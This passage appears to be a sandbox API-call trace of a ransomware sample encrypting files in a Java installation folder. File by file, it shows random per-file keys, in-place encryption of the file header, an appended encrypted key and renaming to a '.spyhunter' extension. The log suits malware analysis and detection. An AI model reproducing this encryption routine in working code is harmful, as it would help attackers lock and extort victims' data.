pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\javafx-iio.dll.spyhunter") returned 65 [0174.943] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\javafx-iio.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javafx-iio.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\javafx-iio.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javafx-iio.dll.spyhunter")) returned 1 [0174.944] GetProcessHeap () returned 0x2c0000 [0174.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.944] GetProcessHeap () returned 0x2c0000 [0174.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0174.944] GetProcessHeap () returned 0x2c0000 [0174.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed25c8 | out: hHeap=0x2c0000) returned 1 [0174.944] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e490 | out: pbBuffer=0x248e490) returned 1 [0174.944] GetProcessHeap () returned 0x2c0000 [0174.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0174.944] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e488*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e488*=0x30) returned 1 [0174.944] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\javacpl.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javacpl.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0174.945] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\javacpl.exe") returned 52 [0174.945] StrStrW (lpFirst="javacpl.exe", lpSrch=".txt") returned 0x0 [0174.945] GetProcessHeap () returned 0x2c0000 [0174.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0174.945] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e44c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e44c*=0x2800, lpOverlapped=0x0) returned 1 [0175.192] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.193] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e44c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e44c*=0x2800, lpOverlapped=0x0) returned 1 [0175.193] GetProcessHeap () returned 0x2c0000 [0175.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0175.193] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.193] WriteFile (in: hFile=0xa0, lpBuffer=0x248e48c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e44c, lpOverlapped=0x0 | out: lpBuffer=0x248e48c*, lpNumberOfBytesWritten=0x248e44c*=0x4, lpOverlapped=0x0) returned 1 [0175.193] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e44c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e44c*=0x30, lpOverlapped=0x0) returned 1 [0175.193] CloseHandle (hObject=0xa0) returned 1 [0175.194] GetProcessHeap () returned 0x2c0000 [0175.194] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.194] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\javacpl.exe.spyhunter") returned 62 [0175.194] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\javacpl.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javacpl.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\javacpl.exe.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\javacpl.exe.spyhunter")) returned 1 [0175.195] GetProcessHeap () returned 0x2c0000 [0175.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.195] GetProcessHeap () returned 0x2c0000 [0175.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0175.195] GetProcessHeap () returned 0x2c0000 [0175.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed2510 | out: hHeap=0x2c0000) returned 1 [0175.195] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e488 | out: pbBuffer=0x248e488) returned 1 [0175.195] GetProcessHeap () returned 0x2c0000 [0175.195] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0175.195] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e480*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e480*=0x30) returned 1 [0175.195] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\j2pkcs11.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\j2pkcs11.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0175.216] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\j2pkcs11.dll") returned 53 [0175.216] StrStrW (lpFirst="j2pkcs11.dll", lpSrch=".txt") returned 0x0 [0175.216] GetProcessHeap () returned 0x2c0000 [0175.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0175.216] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e444, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e444*=0x2800, lpOverlapped=0x0) returned 1 [0175.281] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.281] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e444, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e444*=0x2800, lpOverlapped=0x0) returned 1 [0175.282] GetProcessHeap () returned 0x2c0000 [0175.282] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0175.282] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.282] WriteFile (in: hFile=0xa0, lpBuffer=0x248e484*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e444, lpOverlapped=0x0 | out: lpBuffer=0x248e484*, lpNumberOfBytesWritten=0x248e444*=0x4, lpOverlapped=0x0) returned 1 [0175.282] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e444, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e444*=0x30, lpOverlapped=0x0) returned 1 [0175.282] CloseHandle (hObject=0xa0) returned 1 [0175.282] GetProcessHeap () returned 0x2c0000 [0175.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.282] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\j2pkcs11.dll.spyhunter") returned 63 [0175.282] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\j2pkcs11.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\j2pkcs11.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\j2pkcs11.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\j2pkcs11.dll.spyhunter")) returned 1 [0175.283] GetProcessHeap () returned 0x2c0000 [0175.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.283] GetProcessHeap () returned 0x2c0000 [0175.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0175.283] GetProcessHeap () returned 0x2c0000 [0175.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed2230 | out: hHeap=0x2c0000) returned 1 [0175.284] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e488 | out: pbBuffer=0x248e488) returned 1 [0175.284] GetProcessHeap () returned 0x2c0000 [0175.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0175.284] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e480*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e480*=0x30) returned 1 [0175.284] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\glib-lite.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\glib-lite.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0175.284] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\glib-lite.dll") returned 54 [0175.284] StrStrW (lpFirst="glib-lite.dll", lpSrch=".txt") returned 0x0 [0175.284] GetProcessHeap () returned 0x2c0000 [0175.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0175.285] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e444, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e444*=0x2800, lpOverlapped=0x0) returned 1 [0175.368] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.368] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e444, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e444*=0x2800, lpOverlapped=0x0) returned 1 [0175.369] GetProcessHeap () returned 0x2c0000 [0175.369] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0175.369] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.369] WriteFile (in: hFile=0xa0, lpBuffer=0x248e484*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e444, lpOverlapped=0x0 | out: lpBuffer=0x248e484*, lpNumberOfBytesWritten=0x248e444*=0x4, lpOverlapped=0x0) returned 1 [0175.382] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e444, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e444*=0x30, lpOverlapped=0x0) returned 1 [0175.383] CloseHandle (hObject=0xa0) returned 1 [0175.383] GetProcessHeap () returned 0x2c0000 [0175.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.383] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\glib-lite.dll.spyhunter") returned 64 [0175.383] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\glib-lite.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\glib-lite.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\glib-lite.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\glib-lite.dll.spyhunter")) returned 1 [0175.384] GetProcessHeap () returned 0x2c0000 [0175.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.384] GetProcessHeap () returned 0x2c0000 [0175.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0175.384] GetProcessHeap () returned 0x2c0000 [0175.384] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed2008 | out: hHeap=0x2c0000) returned 1 [0175.384] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e480 | out: pbBuffer=0x248e480) returned 1 [0175.385] GetProcessHeap () returned 0x2c0000 [0175.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0175.385] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e478*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e478*=0x30) returned 1 [0175.385] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\fontmanager.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\fontmanager.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0175.386] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\fontmanager.dll") returned 56 [0175.386] StrStrW (lpFirst="fontmanager.dll", lpSrch=".txt") returned 0x0 [0175.386] GetProcessHeap () returned 0x2c0000 [0175.386] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0175.386] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e43c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e43c*=0x2800, lpOverlapped=0x0) returned 1 [0175.441] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.441] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e43c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e43c*=0x2800, lpOverlapped=0x0) returned 1 [0175.441] GetProcessHeap () returned 0x2c0000 [0175.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0175.441] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.442] WriteFile (in: hFile=0xa0, lpBuffer=0x248e47c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e43c, lpOverlapped=0x0 | out: lpBuffer=0x248e47c*, lpNumberOfBytesWritten=0x248e43c*=0x4, lpOverlapped=0x0) returned 1 [0175.442] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e43c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e43c*=0x30, lpOverlapped=0x0) returned 1 [0175.442] CloseHandle (hObject=0xa0) returned 1 [0175.459] GetProcessHeap () returned 0x2c0000 [0175.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.459] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\fontmanager.dll.spyhunter") returned 66 [0175.459] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\fontmanager.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\fontmanager.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\fontmanager.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\fontmanager.dll.spyhunter")) returned 1 [0175.460] GetProcessHeap () returned 0x2c0000 [0175.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.460] GetProcessHeap () returned 0x2c0000 [0175.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0175.460] GetProcessHeap () returned 0x2c0000 [0175.460] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5f580 | out: hHeap=0x2c0000) returned 1 [0175.460] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e480 | out: pbBuffer=0x248e480) returned 1 [0175.460] GetProcessHeap () returned 0x2c0000 [0175.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0175.460] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e478*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e478*=0x30) returned 1 [0175.461] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\deploy.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\deploy.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0175.462] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\deploy.dll") returned 51 [0175.462] StrStrW (lpFirst="deploy.dll", lpSrch=".txt") returned 0x0 [0175.462] GetProcessHeap () returned 0x2c0000 [0175.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0175.462] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e43c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e43c*=0x2800, lpOverlapped=0x0) returned 1 [0175.463] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.463] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e43c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e43c*=0x2800, lpOverlapped=0x0) returned 1 [0175.463] GetProcessHeap () returned 0x2c0000 [0175.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0175.464] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.464] WriteFile (in: hFile=0x178, lpBuffer=0x248e47c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e43c, lpOverlapped=0x0 | out: lpBuffer=0x248e47c*, lpNumberOfBytesWritten=0x248e43c*=0x4, lpOverlapped=0x0) returned 1 [0175.473] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e43c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e43c*=0x30, lpOverlapped=0x0) returned 1 [0175.473] CloseHandle (hObject=0x178) returned 1 [0175.473] GetProcessHeap () returned 0x2c0000 [0175.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.474] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\deploy.dll.spyhunter") returned 61 [0175.474] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\deploy.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\deploy.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\deploy.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\deploy.dll.spyhunter")) returned 1 [0175.475] GetProcessHeap () returned 0x2c0000 [0175.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.475] GetProcessHeap () returned 0x2c0000 [0175.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0175.475] GetProcessHeap () returned 0x2c0000 [0175.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c205a0 | out: hHeap=0x2c0000) returned 1 [0175.475] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e478 | out: pbBuffer=0x248e478) returned 1 [0175.475] GetProcessHeap () returned 0x2c0000 [0175.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0175.475] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e470*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e470*=0x30) returned 1 [0175.475] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\decora-sse.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\decora-sse.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0175.476] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\decora-sse.dll") returned 55 [0175.476] StrStrW (lpFirst="decora-sse.dll", lpSrch=".txt") returned 0x0 [0175.476] GetProcessHeap () returned 0x2c0000 [0175.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0175.476] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e434, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248e434*=0x2800, lpOverlapped=0x0) returned 1 [0175.496] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0175.496] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e434, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248e434*=0x2800, lpOverlapped=0x0) returned 1 [0175.497] GetProcessHeap () returned 0x2c0000 [0175.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0175.497] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.497] WriteFile (in: hFile=0x178, lpBuffer=0x248e474*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e434, lpOverlapped=0x0 | out: lpBuffer=0x248e474*, lpNumberOfBytesWritten=0x248e434*=0x4, lpOverlapped=0x0) returned 1 [0175.551] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e434, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e434*=0x30, lpOverlapped=0x0) returned 1 [0175.551] CloseHandle (hObject=0x178) returned 1 [0175.551] GetProcessHeap () returned 0x2c0000 [0175.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0175.551] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\decora-sse.dll.spyhunter") returned 65 [0175.551] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\decora-sse.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\decora-sse.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\decora-sse.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\decora-sse.dll.spyhunter")) returned 1 [0175.552] GetProcessHeap () returned 0x2c0000 [0175.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0175.552] GetProcessHeap () returned 0x2c0000 [0175.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0175.552] GetProcessHeap () returned 0x2c0000 [0175.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32bcc0 | out: hHeap=0x2c0000) returned 1 [0175.552] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e478 | out: pbBuffer=0x248e478) returned 1 [0175.552] GetProcessHeap () returned 0x2c0000 [0175.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0175.552] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e470*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e470*=0x30) returned 1 [0175.552] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\awt.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\awt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0175.553] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\awt.dll") returned 48 [0175.553] StrStrW (lpFirst="awt.dll", lpSrch=".txt") returned 0x0 [0175.553] GetProcessHeap () returned 0x2c0000 [0175.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0175.553] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e434, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e434*=0x2800, lpOverlapped=0x0) returned 1 [0175.665] SetFilePointerEx (in: hFile=0x178, 